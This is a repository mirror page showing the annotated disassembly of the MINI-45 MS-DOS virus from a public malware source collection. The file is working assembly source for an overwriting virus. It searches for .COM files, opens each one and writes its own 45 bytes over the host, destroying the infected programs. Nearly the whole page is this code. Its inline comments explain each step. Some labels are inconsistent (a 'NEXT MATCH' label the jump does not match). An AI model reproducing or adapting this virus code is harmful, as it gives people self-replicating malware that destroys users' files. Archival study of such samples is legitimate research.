ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6332d7096f
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.mini-45.asm
vxunderground 14e07ba726
Add files via upload
2021-01-12 17:49:21 -06:00

50 lines
2.4 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;***************************************************************
; DISASSEMBLY of the MINI-45 VIRUS
;***************************************************************
; FIND .COM FILE TO INFECT
;***************************************************************
MOV DX, 127h ;filehandle search criteria-27bytes
;away from beg. of file
MOV AH, 4Eh ;setup for Dos function-find file
INT 21h ;search for first file match
JB FILESPEC ;jump below and return
;****************************************************************
; OPEN FILE
;****************************************************************
FIRST_FILE:
MOV DX, 009Eh ;pointer to asciiz file spec
MOV AX, 3D02h ;moving 3d into ah=call dos to open file
;moving 02 into al=we want read\write
;access
INT 21h ;call dos function and open file.
;file handle found is put in ax register
JB NEXT_MATCH ;search for next match
;****************************************************************
; WRITE VIRUS CODE TO FILE
;****************************************************************
XCHG AX,BX ;put retrieved file handle from 3d open
;call into bx so it can be used for
;write function.
MOV DX, 0100h ;point to buffer of data to write, i.e.
;to myself
MOV CX, 002Dh ;#of bytes to write. 45d bytes
MOV AH, 40h ;setup write to file dos function
INT 21h ;write to file indicated in bx
;******************************************************************
; CLOSE FILE
;******************************************************************
MOV AH, 3Eh ;setup for dos function to close file
INT 21h ;close file
;******************************************************************
; FIND NEXT FILE MATCH
;******************************************************************
NEXT MATCH:
MOV AH, 4Fh ;search for next file match
JMP FIRST_FILE ;return above
;******************************************************************
;
FILESPEC:
db '*.com'
db 00

Reference in New Issue View Git Blame Copy Permalink